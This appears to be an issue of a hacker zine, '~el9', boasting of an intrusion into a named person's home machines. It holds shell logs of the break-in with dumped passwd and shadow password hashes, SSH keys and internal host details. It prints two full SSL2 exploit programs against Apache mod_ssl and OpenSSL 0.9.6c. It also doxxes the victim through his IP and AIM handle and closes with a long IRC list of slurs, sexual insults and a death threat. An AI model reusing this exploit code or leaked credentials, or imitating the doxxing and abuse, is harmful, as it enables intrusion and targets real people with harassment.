################################################ ##::::::::::::::::::::::::::::::::::::::::::::## ##:'####::::::'########:'##::::::::'#######:::## ##'## ##:'##: ##.....:: ##:::::::'##.... ##::## ##..::. ####:: ##::::::: ##::::::: ##:::: ##::## ##:::::....::: ######::: ##:::::::: ########::## ##:::::::::::: ##...:::: ##:::::::::::::: ##::## ##:::::::::::: ##::::::: ##:::::::::::::: ##::## ##:::~el9[1]:: ########: ########:. #######:::## ##::::::::::::........::........:::.......::::## ################################################ ## where have all the turkeys g0ne???? ## ################################################ ## fuqkn up turkeys since 2002 ## ################################################ ## this version of ~el9 is dedicated to the ## ## letters P, H, C and the number 8 ## ################################################ .----------------------------------------------. ; t4ble of h0ly w4r3z & bey0nd ; ; `------------------------------' ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; ; *00* ~e~ turk3y m4dness ; `----------------------------------------------' .----------------------------------------------. ; t4ble of ~el9 m3mbrZ ; ; `------------------------------' ; ; h4mst3r tHug ang3L ; ; s1lly tw1ddly-d1lly w1lly ; ; o0oO0oga boo0OoO0o0ga ; ; n34l t0w3y ; ; z3n-p4rse ; ; m1n1 j1mj0n3s ; `----------------------------------------------' .~e~----------------------------------------------------------~e~. ; *00* turk3y m4dness ; `----------------------------------------------------------------' gobble. fucking gobble bitch. .~e~----------------------------------------------------------~e~. ; ; `----------------------------------------------------------------' .-Ä nwonknu [~nwonknu@dsl-65-187-119-141.telocity.com] has joined #phrack .-Ä bmcw [~nwonknu@dsl-65-187-119-141.telocity.com] has joined #phrack .-Ä bmcw [~bmcw@dsl-65-187-119-141.telocity.com] has joined #phrack nobody@65.187.119.141's password: // shame on you nobody@comic:/$ who rocky tty1 Sep 12 18:42 rocky tty2 Sep 12 18:47 rocky tty4 Sep 12 21:06 rocky tty13 Sep 12 18:51 rocky tty14 Sep 12 20:03 rocky tty15 Sep 12 20:03 rocky tty22 Sep 12 21:22 rocky tty23 Sep 12 19:45 nobody pts/0 Sep 13 02:55 (gator) nobody pts/1 Sep 13 03:45 (gator) // yo adrian nobody@comic:/etc$ cat hosts 127.0.0.1 localhost 192.168.0.100 comic.gestapo.org comic 63.170.23.10 gestapo.org 192.168.0.1 gator 192.168.0.101 dev 217.156.117.205 oroles.digitalnerds.net oroles nobody@comic:/etc$ cat passwd root:x:0:0:root:/root:/bin/bash man:x:6:100:man:/var/cache/man:/bin/sh rocky:x:1000:101::/usr/home/rocky:/bin/bash sshd:x:101:65534::/var/run/sshd:/bin/false dw:x:1001:103::/usr/home/dw:/bin/tcsh ftp:x:1002:104::/home/ftp:/bin/bash drater:x:1003:105::/usr/home/drater:/bin/bash x90:x:1004:106::/usr/home/x90:/bin/bash sprinkles:x:1005:107::/usr/home/sprinkles:/bin/bash anakata:x:1006:108::/usr/home/anakata:/bin/tcsh nobody:x:1007:100::/home/nobody:/bin/bash rh:x:1008:100::/home/rh:/bin/bash // this box has bad people on it nobody@comic:/etc/alternatives$ uname -a ; id Linux comic 2.4.19 #1 Sun Sep 1 12:42:10 EDT 2002 i686 unknown uid=1007(nobody) gid=100(users) groups=100(users) nobody@comic:/usr/home$ ls -lR * anakata: total 0 drater: total 0 dw: total 1808 -rw-r--r-- 1 dw dw 1844736 Sep 5 09:35 Project.doc ls: lost+found: Permission denied ls: rocky: Permission denied sprinkles: total 0 x90: total 2116 -rw-r--r-- 1 x90 x90 2151178 Sep 4 20:03 openssl-0.9.6c.tar.gz -rw-r--r-- 1 x90 x90 7868 Sep 10 18:12 ssl2x.c // this ssl2x.c file was pretty interesting -- ssl2x.c - begin - /* openssl remote soon-to-be-exploit for apache+mod_ssl */ /* we cheat using a ethereal dump for our handshake setup */ /* trying to abuse an ebp/eip hit rather than the malloc molestation */ /* if succesfull this should make remote bruteforcing a hell off alot more convenient */ /* KEEPING IT SIMPLE, the object of an exploit is to reach a bug */ /* not be a fully functional client ... fuckers */ /* V0.01, testbed rh62 + Server: Apache/1.3.26 (Unix) mod_ssl/2.8.10 OpenSSL/0.9.6c */ #include #include #include #include #include #include #include #include #include #include #include #include /* read timeout in seconds */ #define R_TIMEOUT 1 #define SSLPORT 443 #define BUFSIZE 4096 #define SSL2_TYPECODE 0x80 /* Message type: 0x02, Cipherspec: 0x080080 (SSL2_RC4_64_WITH_MD5) */ /* 0xTTSSSSSS */ #define MESSAGE_TYPE_AND_CIPHERSPEC 0x02080080 /* playing with buff layouts crashing in different manners */ /* reliable child eip hits on two different testbeds using this layout */ /* holds our reghit (overwrites ebp+eip on my testbed) can be > 8 */ #define CLEAR_KEY_DATA_LEN 8 /* we start to get reliable child eip hits when this buf is >= 132 bytes */ #define ENCRYPTED_KEY_DATA_LEN 132 /* this wants to be >= 334 in combination with the previous bufsize */ #define KEY_ARG_LEN 334 /* default register hit */ #define REGHIT 0xcafebabe #define ALLIGN 0 struct info { unsigned char type; unsigned char size; unsigned char type_and_cspec[4]; unsigned short kdl; unsigned short ekdl; unsigned short kal; unsigned char ckd[CLEAR_KEY_DATA_LEN]; unsigned char ekd[ENCRYPTED_KEY_DATA_LEN]; unsigned char kad[KEY_ARG_LEN]; } xssl2; #define SPAWN 0 #define MAXSPAWN 100 #define SPAWNOPEN 1 #define SPAWNCLOSE 0 int spawn(int num, char *h, int p, int mode); int open_s(char *h, int p); int read_s(char *buf, int s, int timeout_secs); int send_hello(int s); int x(int s, unsigned long reghit, int allign); void usage(char *name); int main(int argc, char **argv) { int p = SSLPORT, s, i, bread, numspawn = SPAWN, allign = ALLIGN; char c, *h, buf[BUFSIZE], *tmp; unsigned long reghit = REGHIT; if(argc==1) { usage(argv[0]); exit(1); } while((c = getopt(argc, argv, "t:p:s:i:a:")) != EOF) { switch(c) { case 't': h = optarg; break; case 'p': p = atoi(optarg); break; case 's': numspawn = atoi(optarg); break; case 'i': sscanf(optarg, "%p", &tmp); reghit = (long)tmp; break; case 'a': allign = atoi(optarg); break; default: fprintf(stderr, "No comprende\n"); exit(1); } } if(numspawn > 0) { fprintf(stderr, "Spawning children"); if(spawn(numspawn, h, p, SPAWNOPEN) < 0) { fprintf(stderr, "Error spawning children\n"); exit(1); } } if((s = open_s(h, p)) < 0) { fprintf(stderr, "open_s() error\n"); exit(1); } if(send_hello(s) < 0) { fprintf(stderr, "send_hello() error\n"); exit(1); } /* get response (we care? no!) */ do { memset(buf, '\0', BUFSIZE); if((bread = read_s(buf, s, R_TIMEOUT)) > 0) fprintf(stderr, "Got %d byte response\n", bread); } while(bread > 0); /* rape that motherfucker */ fprintf(stderr, "Going for the hump\n"); if(x(s, reghit, allign) < 0) { fprintf(stderr, "YOU ARE A FAILURE\n"); exit(1); } close(s); /* be nice and kill off the kids if we got some */ if(numspawn > 0) spawn(numspawn, NULL, 0, SPAWNCLOSE); exit(1); } void usage(char *name) { fprintf(stderr, "\n%s -t \n\n" "Tweak options:\n" "\t-p \t(set ssl port, default: 443)\n" "\t-s \t(spawn n children before fatal hit, default: 0)\n" "\t-i <0xdeadbeef>\t(set register hit, default: 0xdeadbeef)\n" "\t-a \t(allign reghit bytes by n bytes. NU USE YET)\n\n" , name); } int spawn(int num, char *h, int p, int mode) { static int socks[MAXSPAWN]; int i; if(num <= 0 || num > MAXSPAWN) { fprintf(stderr, "har har..bitch (spawn() error)\n"); return -1; } if(mode==SPAWNOPEN) { for(i=0;i 4 bits type, 12 bits size */ xssl2.type = (SSL2_TYPECODE & 0xf0) + (((unsigned char *)&size)[1]); xssl2.size = (size) & 0xff; *(long *)&xssl2.type_and_cspec[0] = htonl(MESSAGE_TYPE_AND_CIPHERSPEC); xssl2.kdl = htons(CLEAR_KEY_DATA_LEN); xssl2.ekdl = htons(ENCRYPTED_KEY_DATA_LEN); xssl2.kal = htons(KEY_ARG_LEN); fprintf(stderr, "Using %p as register hit\n", reghit); for(i=0;i 0) { if((b_read = read(s, buf, BUFSIZE-1)) > 0) return b_read; } fprintf(stderr, "Timeout on read()\n"); return -1; } int open_s(char *h, int p) { struct sockaddr_in remote; struct hostent *iplookup; char *ip; int sfd; if((iplookup = gethostbyname(h)) == NULL) { perror("gethostbyname"); return -1; } ip = (char *)inet_ntoa(*((struct in_addr *)iplookup->h_addr)); remote.sin_family = AF_INET; remote.sin_addr.s_addr = inet_addr(ip); remote.sin_port = htons(p); memset(&(remote.sin_zero), '\0', 8); if((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); return -1; } if(connect(sfd, (struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { perror("connect"); return -1; } return sfd; } -- ssl2x.c - end - // let's take a look at this again nobody@comic:/etc$ cat hosts 127.0.0.1 localhost 192.168.0.100 comic.gestapo.org comic 63.170.23.10 gestapo.org 192.168.0.1 gator 192.168.0.101 dev 217.156.117.205 oroles.digitalnerds.net oroles nobody@comic:/etc$ ssh root@dev root@dev's password: Last login: Fri Sep 13 03:44:18 2002 from comic on pts/1 Linux dev 2.4.19 #1 Mon Sep 2 20:19:06 EDT 2002 i586 unknown Most of the programs included with the Debian GNU/Linux system are freely redistributable; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Sep 13 03:44:18 2002 from comic dev:~# // again. bad passwords for the turkey. dev:~# ps ax {neigh_table_clear} {neigh_parms_alloc} Warning: /boot/System.map does not match kernel data. PID TTY STAT TIME COMMAND 1 ? S 0:06 init [2] 2 ? SW 0:00 [keventd] 3 ? SWN 0:00 [ksoftirqd_CPU0] 4 ? SW 0:02 [kswapd] 5 ? SW 0:00 [bdflush] 6 ? SW 0:00 [kupdated] 7 ? SW 0:03 [kjournald] 74 ? SW 0:00 [kjournald] 75 ? SW 0:00 [kjournald] 102 ? S 0:00 /sbin/portmap 159 ? S 0:00 /sbin/syslogd 162 ? S 0:00 /sbin/klogd 169 ? S 0:00 /sbin/rpc.statd 176 ? S 0:00 /usr/sbin/inetd 206 ? S 0:00 /usr/sbin/lpd 287 ? S 0:00 /usr/sbin/sshd 323 ? S 0:00 /usr/sbin/atd 326 ? S 0:00 /usr/sbin/cron 329 tty1 S 0:00 /sbin/getty 38400 tty1 330 tty2 S 0:00 /sbin/getty 38400 tty2 331 tty3 S 0:00 /sbin/getty 38400 tty3 332 tty4 S 0:00 /sbin/getty 38400 tty4 333 tty5 S 0:00 /sbin/getty 38400 tty5 334 tty6 S 0:00 /sbin/getty 38400 tty6 687 ? S 0:00 /usr/sbin/snmpd -s -l /dev/null 689 ? S 0:00 /usr/sbin/snmptrapd -s 7197 ? S 0:01 /usr/sbin/sshd 7199 pts/1 S 0:00 -tcsh 7212 ? S 0:00 /usr/sbin/sshd 7214 pts/0 S 0:00 -tcsh 7228 pts/0 R 0:00 ps ax SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1 dev:~/stuff/changes# cat /etc/hosts 127.0.0.1 dev localhost 192.168.0.100 comic dev:~# ls -l oddssl/ total 20 -rwx------ 1 root root 9861 Sep 6 14:39 ssl2x -rw------- 1 root root 7868 Sep 6 14:39 ssl2x.c dev:~# ls -latr total 52 -rw-r--r-- 1 root root 202 Dec 20 1999 .profile drwx------ 2 root root 4096 Sep 1 10:03 .ssh drwxr-xr-x 2 root root 4096 Sep 1 14:52 .lftp drwxr-xr-x 23 root root 4096 Sep 2 12:33 .. -rw-r--r-- 1 root root 446 Sep 4 01:38 .bashrc -rw-r--r-- 1 root root 422 Sep 4 01:39 .cshrc drwx------ 3 root root 4096 Sep 6 11:05 stuff drwx------ 2 root root 4096 Sep 6 14:39 oddssl drwx------ 2 root root 4096 Sep 10 15:27 .links -rw------- 1 root root 81 Sep 10 16:19 .bash_history -rw------- 1 root root 4829 Sep 13 03:40 .viminfo drwx------ 7 root root 4096 Sep 13 03:40 . // ssl fetish? dev:/work/src# ls apache_1.3.26 mod_ssl-2.8.9-1.3.26 openssl-0.9.6c apache_1.3.26.tar.gz mod_ssl-2.8.9-1.3.26.tar.gz openssl-0.9.6c.tar.gz dev:/# ls -latr total 16521 drwxr-xr-x 2 root root 4096 Feb 8 2002 mnt drwx------ 2 root root 16384 Sep 1 09:48 lost+found lrwxrwxrwx 1 root root 26 Sep 1 09:48 vmlinuz -> boot/vmlinuz -2.2.20-idepci drwxr-xr-x 13 root root 4096 Sep 1 09:50 var drwxr-xr-x 2 root root 4096 Sep 1 09:50 opt drwxr-xr-x 2 root root 4096 Sep 1 09:50 initrd drwxr-xr-x 2 root root 4096 Sep 1 09:50 floppy drwxr-xr-x 2 root root 4096 Sep 1 09:50 cdrom drwxr-xr-x 2 root root 4096 Sep 1 10:03 bin -rw------- 1 root root 16777216 Sep 1 10:27 .journal drwxr-xr-x 2 root root 4096 Sep 1 11:49 sbin drwxr-xr-x 23 root root 4096 Sep 2 12:33 .. drwxr-xr-x 23 root root 4096 Sep 2 12:33 . drwx------ 3 root root 4096 Sep 2 12:35 audit drwxr-xr-x 3 root root 1024 Sep 2 20:22 boot drwxr-xr-x 6 root root 4096 Sep 3 23:17 lib drwxr-xr-x 17 root root 4096 Sep 4 17:13 usr drwxrwxrwt 3 root root 4096 Sep 9 18:50 work drwxrwsr-x 4 root staff 4096 Sep 9 19:31 home dr-xr-xr-x 45 root root 0 Sep 10 15:02 proc drwxr-xr-x 9 root root 24576 Sep 10 15:03 dev drwxr-xr-x 59 root root 4096 Sep 10 18:08 etc drwxr-xr-x 6 root root 4096 Sep 10 18:32 test drwx------ 7 root root 4096 Sep 13 03:50 root drwxrwxrwt 3 root root 4096 Sep 13 03:52 tmp // this box was pretty boring dev:~# su rocky dev:/root> cd dev:~> ls -latr total 124 -rw-r--r-- 1 rocky rocky 1093 Sep 2 04:36 .bashrc -rw-r--r-- 1 rocky rocky 509 Sep 2 04:36 .bash_profile -rw-r--r-- 1 rocky rocky 266 Sep 2 04:36 .alias -rw-r--r-- 1 rocky rocky 386 Sep 2 04:38 .cshrc drwx------ 2 rocky rocky 4096 Sep 2 04:43 .lftp drwx------ 4 rocky rocky 4096 Sep 2 17:24 audit drwx------ 2 rocky rocky 4096 Sep 2 17:24 .ssh -rw------- 1 rocky rocky 2778 Sep 4 11:26 .vimrc -rw------- 1 rocky rocky 0 Sep 6 05:52 .viminfo.tmp drwxrwsr-x 4 root staff 4096 Sep 9 19:31 .. drwxr-xr-x 4 rocky rocky 4096 Sep 10 15:01 .netscape drwx------ 2 rocky rocky 4096 Sep 10 17:59 .links -rw------- 1 rocky rocky 7852 Sep 10 18:50 ssl2x.c -rw------- 1 rocky rocky 4307 Sep 10 18:50 .viminfo -rw------- 1 root root 4591 Sep 10 18:52 own-ssl2-malloc.c -rw------- 1 root root 4162 Sep 10 18:52 own-ssl2-closer.c -rwx------ 1 root root 9861 Sep 10 18:53 z -rwx------ 1 root root 7349 Sep 10 18:58 own-ssl2-closer -rwx------ 1 root root 7381 Sep 10 18:58 own-ssl2-malloc drwx------ 8 rocky rocky 4096 Sep 11 17:48 . -rwx------ 1 rocky rocky 9861 Sep 11 17:48 ssl2x drwx------ 2 rocky rocky 4096 Sep 13 03:40 blah dev:~# uname -a ; id Linux dev 2.4.19 #1 Mon Sep 2 20:19:06 EDT 2002 i586 unknown uid=0(root) gid=0(root) groups=0(root) // root:$1$suG1e9sD$l9aT7Dl7EhYAd4fOO9CAg1:11931:0:99999:7::: daemon:*:11931:0:99999:7::: bin:*:11931:0:99999:7::: sys:*:11931:0:99999:7::: sync:*:11931:0:99999:7::: games:*:11931:0:99999:7::: man:*:11931:0:99999:7::: lp:*:11931:0:99999:7::: mail:*:11931:0:99999:7::: news:*:11931:0:99999:7::: uucp:*:11931:0:99999:7::: proxy:*:11931:0:99999:7::: postgres:*:11931:0:99999:7::: www-data:*:11931:0:99999:7::: backup:*:11931:0:99999:7::: operator:*:11931:0:99999:7::: list:*:11931:0:99999:7::: irc:*:11931:0:99999:7::: gnats:*:11931:0:99999:7::: nobody:*:11931:0:99999:7::: identd:!:11931:0:99999:7::: sshd:!:11931:0:99999:7::: rocky:$1$tK3X5LjX$c9IWHQiC1QCN3xQ6nqBVC.:11932:0:99999:7::: ftp:!:11932:0:99999:7::: // dev:~rocky# cat own-ssl2-malloc.c dev:~rocky# cat own-ssl2-closer.c #include #include #include #include #include #include #include #define SSLV2_MASTER_KEY_CODE 0x80 #define KEY_CLEAR_SIZE 0 #define KEY_BUFFER_SIZE 132 //128 #define KEY_ARG_SIZE 168 #define SSLV2_MASTER_KEY_BUF_SIZE 12 + KEY_CLEAR_SIZE + KEY_BUFFER_SIZE + KEY_ARG_SIZE #define SSLV2_KEY_BUF_OFFSET + 12 #define SSLV2_KEY_ARG_OFFSET + KEY_BUFFER_SIZE const unsigned char sslV2Hello[] = "\x80\x2b\x01\x00\x02\x00\x12\x00\x00\x00\x10\x01\x00\x80\x07\x00\xc0\x03\x00\x80\x06\x00\x40\x02\x00\x80\x04\x00\x80\x33\x57\x82\x3f\x93\xc9\xc6\x50\x93\x3e\x32\x3a\x46\x24\x2f\x0f"; int openSslV2(unsigned long addr, unsigned short port); char sendSslV2Hello(int fd); char sendSslV2MasterKey(int fd); void closeSslV2(int fd); int main(int argc, char **argv) { extern char *optarg; unsigned long target = -1; unsigned short port = 0; int c, fd; while ((c = getopt(argc, argv, "t:p:")) != EOF) { switch(c) { case 't': target = inet_addr(optarg); break; case 'p': port = atoi(optarg) & 0xFFFF; break; default: break; } } if ((target == -1) || (port == 0)) { fprintf(stdout,"Usage: %s -t target_ip -p port\n", argv[0]); return 0; } if (!(fd = openSslV2(target, port))) { perror("openSslV2"); return 0; } fprintf(stdout,"Connected.\n"); if (!sendSslV2Hello(fd)) { fprintf(stdout,"sendSslV2Hello failed.\n"); return 0; } fprintf(stdout,"Sent HELLO.\n"); if (!sendSslV2MasterKey(fd)) { fprintf(stdout,"sendSslV2MasterKey failed.\n"); return 0; } fprintf(stdout,"Sent MASTER KEY.\n"); while (1) sleep(1); } int openSslV2(unsigned long addr, unsigned short port) { struct sockaddr_in s; int fd; if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) <= 0) return 0; s.sin_family = AF_INET; s.sin_port = htons(port); s.sin_addr.s_addr = addr; if (connect(fd, (struct sockaddr *)&s, sizeof(s)) != 0) return 0; return fd; } char sendSslV2Hello(int fd) { return (write(fd, (const char *)sslV2Hello, sizeof(sslV2Hello)-1) == sizeof(sslV2Hello)-1)?1:0; } char sendSslV2MasterKey(int fd) { unsigned char mk[SSLV2_MASTER_KEY_BUF_SIZE]; unsigned int size = SSLV2_MASTER_KEY_BUF_SIZE - 2; unsigned int x, addr = 0x81e4982, satisfyRsa = 0x1000; // 0x812e268 fprintf(stdout,"size = %d\n", SSLV2_MASTER_KEY_BUF_SIZE); memset(mk, 0x41, SSLV2_MASTER_KEY_BUF_SIZE - 4); //controling eax *((unsigned long *)(mk + SSLV2_MASTER_KEY_BUF_SIZE - 20)) = 0x00001000; *((unsigned long *)(mk + SSLV2_MASTER_KEY_BUF_SIZE - 4)) = 0x0812e2d0; // this points to where our 0x00001000 is in memory *(mk) = (SSLV2_MASTER_KEY_CODE & 0xF0) + (((unsigned char *)&size)[1]); *(mk+1) = (size) & 0xFF; *((unsigned long *)(mk+2)) = htonl(0x02080080); *((unsigned short *)(mk+6)) = KEY_CLEAR_SIZE & 0xFF00; *((unsigned short *)(mk+7)) = KEY_CLEAR_SIZE & 0x00FF; *((unsigned short *)(mk+8)) = KEY_BUFFER_SIZE & 0xFF00; *((unsigned short *)(mk+9)) = KEY_BUFFER_SIZE & 0x00FF; *((unsigned short *)(mk+10)) = KEY_ARG_SIZE & 0xFF00; *((unsigned short *)(mk+11)) = KEY_ARG_SIZE & 0x00FF; return (write(fd, (const char *)mk, SSLV2_MASTER_KEY_BUF_SIZE) == SSLV2_MASTER_KEY_BUF_SIZE)?1:0; } void closeSslV2(int fd) { close(fd); } dev:~rocky/.ssh# cat known_hosts security.gestapo.org,206.104.238.9 ssh-dss AAAAB3NzaC1kc3MAAACBAIo+ZOf9ya3x0+MzkYxoe4E5zpa6EsmFoq03P14o7pQf6RgAKDTEfcmqZLwV5NUCGI8T7rgyP4Y4Bn7Kiip45D3DvEVjMNBVI0V4IQLDlO53MKQ5j6Nn+/kLQcImK2nJZa7TXboMsijVSMigLI+3naxqhjRsQB8/9dCfXeWTeP4xAAAAFQClzhGrHZ7oM3+NpoRYC1wQ18wZcQAAAIBHMCL/APZ6BNYAcJVS1el3btW+Np4iQI2B1+JsbeeCN+l7RAOzc3ZQc+jsMNVryQVetRfjnu/gmuo2RKGeXYBjq7mAWIdAaZw0gWX0A3sy1rkgiacr/mz8jZYRy9Biv+wlsSaMWOcaWwnBNMcCQ2t7pPLoezqXJMP/BHE/3s2mZwAAAIBCdSMqEmJl2cJp7eayO91KDeTe5qqGJL4XqEskp2+eWs8D5sTFXLsuqKimEW16pv2dXITnXPwdOzmg70ubjngKCjm2lxOXohqYMfCbJfG0KCdHgiTjOlHNU/FLKNKNQBmIFdWBafkVO6SzActghQlHxPhUkVoUewIbAvgMsYlCdA== dev:~rocky/.ssh# dev:~rocky/.ssh# cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAlpN4vFhddNxmrq/qrZLCStNAJZWbsMJJco3gyRtWe1LwvUgrVh6U8y4OGeuWE4FEgucgHbN+Sxusso4+BN0Vw9doiZRGqhzeIe4vDEKdntjGXQfxO8eU9zeuTumsMWF746X2BYiCOTbgTzZ7osyMNOK8git7WdMxiVxhqYHXiu0= rocky@wombat dev:~rocky/.ssh# http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm http://www.ponysworld.com/dead.htm nobody@comic:/$ finger rocky Login: rocky Name: Directory: /usr/home/rocky Shell: /bin/bash On since Thu Sep 12 18:42 (EDT) on tty1 7 hours 53 minutes idle (messages off) On since Thu Sep 12 18:47 (EDT) on tty2 6 hours 56 minutes idle (messages off) On since Thu Sep 12 21:06 (EDT) on tty4 7 hours 18 minutes idle (messages off) On since Thu Sep 12 18:51 (EDT) on tty13 8 hours 1 minute idle (messages off) On since Thu Sep 12 20:03 (EDT) on tty14 6 hours 53 minutes idle (messages off) On since Thu Sep 12 20:03 (EDT) on tty15 6 hours 59 minutes idle (messages off) On since Thu Sep 12 21:22 (EDT) on tty22 6 hours 52 minutes idle (messages off) On since Thu Sep 12 19:45 (EDT) on tty23 6 hours 47 minutes idle (messages off) No mail. No Plan. // just to verify. at the time nwonknu was idle on aim for exactly // 6 hours and 47 minutes. coincidence? oh. his screen name is // zpoxciuvby // yes. aim. zpoxciuvby. message nwonknu now and tell him how much // you love him, and how you want his giblets. we at ~el9 attempted to interview nwonknu for this edition. here is the transcript. (23:04:16) th4nk5g1v1n: can i have you? (23:06:21) zpoxciuvby: ? (23:06:48) th4nk5g1v1n: can i have you? (23:07:06) zpoxciuvby: sure, cya. (23:07:16) th4nk5g1v1n: mmm... cranberry sauce (23:07:49) th4nk5g1v1n: i like turkeys (23:09:42) th4nk5g1v1n: nwonknu go gobble gobble? (23:10:01) zpoxciuvby: lol (23:12:22) th4nk5g1v1n: i dont chat much what's 'lol' ? (23:15:16) zpoxciuvby: i don't chat much either. :> (23:16:21) th4nk5g1v1n: i would like to interview you about the recent compromise of your home network, do you have a minute? (23:16:58) zpoxciuvby: heh, ur funny. (23:17:31) th4nk5g1v1n: seriously rocky, I have some questions (23:18:01) zpoxciuvby: i'm certain you do... however, I'm too wasted at the moment. (23:18:05) zpoxciuvby: catch ya l8r (23:18:30) th4nk5g1v1n: interviews are more fun that way // intoxicated turkey wasn't much fun. maybe some other time nwonknu? ;0 [ Anveo ] you [ IceKool ] you [ ThaReaper ] you [ duu ] you [ b07 ] you're a homo [ blk^majik ] you're a fuckhead [ m4t ] you're mom gives good head teeheheheheh [ rell ] umm you [ ark0n- ] you [ lopt ] you [ ksh- ] be original [ remedy ] you [ jo3y_ ] you're a joke [ cyb^ ] you [ h00ch ] you [ nein ] you [ yoda_ ] you [vsionide ] you [ vipo- ] you + fucking homo [ xspace ] you [@halfdead ] a pic of your ass @ goatse.cx you also have a small penis on top of this all you'll be owned soon enuff [ worzeel ] you [ bratecdaj ] you [ ultor ] you [ dragnet_ ] you [ yaz ] you [ aempirei ] dude where's your car! [ chmod_ ] you [ matrix ] you [ Leak ] you [ b07_ ] you're sister has pretty lips [ verb ] i like math [@d1m ] sorry excuse for the invention of peptolbismol [@m4vis ] i'd waste time with you [ PyroFX ] you suck [ artist ] you suck [ Scrippie ] you suck [ spyroot ] you're cool [@shiftee ] you're a fucking homosexual lubbin cry fucking baby nwonknu ass lickin bi0tch [ xbud ] you suck [ blakangel ] you suck [ BigD0G ] your a dog [ snuggl ] snuggle my nads [ DJ_SnM ] yo suck [ rd ] [ rza- ] wutang! [ misery ] you suck [ r00ter ] get some originallity [ ryannn ] rash @ anal-hog dot org [ BrainRawt ] yes #phrack brain rotten [ jana ] you suck [ ryann ] you fucking cockmonkey [ wanvadder ] you suck [ skrip ] you suck [ dove ] you're ok [ sic_ ] i dont knwo you [@j1zZmoPr ] youre opped so you must suck madd dick [ daresh ] hah dont know [ Miker_ ] miker!!! [ muska ] hah [ grams ] you suck [ nvno1 ] you smoke a lot of thc! [ _muska ] hah fuck you [ EM_ ] you suck [ acksyn ] get a life [ sector ] you're cool [ nrm1 ] hah! you fucking loser [ Ho0ke ] you suck [ stevoo ] urcle! [ androz ] fuck you [ sarcasmo_ ] learn to spell [ acidjazz ] you're a homo [ _Blood ] you too [ bofhic ] heh fuck you [vnawk ] nawk on my door and get shot bi0tch in all actuallity you fucking suck.!. [ hellman ] you're gay [ s0ny- ] you suck [ Kikudjiro ] b00m [ dabomb ] on bin laden [ twd_ ] you suck [ trycky ] duck duck goose [ guidob ] you're cool, but gay [ pip ] you suck [ lukaszw ] lahoo-fucking-sir [ no1 ] dude you're going down! heh you're going to fucking die. [ fah ] bah [ sporaw_ ] you're a homo and you're mom give sgood head [ phantom__ ] unf [ know|edge ] you suck [ mstevens ] you suck [@anakata ] hah dude you got owned 2 and you're a sorry excuse for the nice little boy, you're mom made up [@drater ] hah you're right up there but we're not done with you... we already own your upstream you scum fucking kangaroo!! aka ron1n [ specs ] asdf [ fidel ] asdf [ x0ni ] asdf [ Ivo ] adsf [vnvno1 ] asdf [ essgee ] SG unf! [ exploited ] asdf [ Bloodmask ] asdf [ espionage ] adsf [ system_v ] you humped mosthated [ Safety ] adsf [ DominusQ ] asdf [@vox_ ] you koalabitchcockwhoringmonkeyasslickinwaddofdick! [@morgan ] learn to code / ssh-channel overflow shit thing fucking code was gay! [ hani ] asdf [ neural ] asdf [ numacra ] asdf [@soupnazi ] if i were you i'd fuck my dog and commit suicide, cause that's the last play id ever get! [ _a ] alicia! [ icedsun_a ] asdf [ oclet ] you you you just plain out suck. [ chill- ] asdf [ zer- ] asdf [ yan ] asdf [ wait3r ] asdf [ pewp ] adsf [ Slow_ ] asdf [ dustinD ] asdf [@par ] umm i'lll let you live [ scuzzy ] asdf [ herbal1zr ] asdf [ Tont0 ] adsf [ mrheh ] asdf [ pud ] asdf [ kamiz ] asdf [ alchemy ] asdf too many fucking people in this channnel!!!!!!!!!!!!!!!!!!! [ orangehaw ] fuckyou [@interline ] you're a fucking retarded homo [@vipah ] kangaroo's give great head don't they? [ logikal ] nuts in your mouth [vsd ] asdf [ redcoder ] asdf [ cynder ] asdf [ sdr ] cdc fed spook fuck you hahhahhahahhahhaha [ tsilik ] asdf [ Holborn ] asdf [ zing ] asdf // bling bling gobble gobble